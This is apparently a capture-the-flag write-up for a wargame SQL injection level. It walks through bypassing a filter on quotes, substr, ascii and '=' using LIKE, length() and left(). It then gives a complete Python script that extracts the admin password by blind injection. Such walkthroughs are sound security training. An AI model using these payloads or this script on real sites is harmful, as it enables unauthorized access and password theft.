Source code analysis
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
Single quotes, substr, ascii and = are filtered.
Using the pw parameter would require a single quote, which is blocked,
so we go after the no parameter instead.
?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and%20length(pw)%20like%208
?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and%20left(pw,1)%20like%20"1"
import http.client

result = ''
leng = 0
header = {'Cookie': ' '}   # session cookie for the challenge (left blank in the original)
# candidate characters tried at each position (76 in total)
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Step 1: find the length of the admin password with length(pw) like N
for i in range(1, 100):
    length = ('/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=1234&no=123%20or%20id%20LIKE%20"admin"'
              '%20and%20length(pw)%20like%20' + str(i))
    conn = http.client.HTTPConnection('los.eagle-jump.org')
    conn.request('GET', length, '', header)
    data = conn.getresponse().read()
    if "Hello admin" in data.decode():
        leng = i
        print("pw length: " + str(i))
        break

# Step 2: recover the password one character at a time with
# left(pw, i) like "<known prefix><candidate>"; LIKE is case-insensitive
# under MySQL's default collation, so letters come back in whichever case
# is tried first (lowercase here)
for i in range(1, leng + 1):
    for j in range(0, 76):
        substr = ('/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=1234&no=123%20or%20id%20LIKE%20"admin"'
                  '%20and%20left(pw,' + str(i) + ')%20like%20"' + result + string[j] + '"')
        conn = http.client.HTTPConnection('los.eagle-jump.org')
        conn.request('GET', substr, '', header)
        data = conn.getresponse().read()
        if 'Hello admin' in data.decode():
            result = result + string[j]
            print('left(pw,' + str(i) + ')= ' + result)
            break

print('Password is ' + result)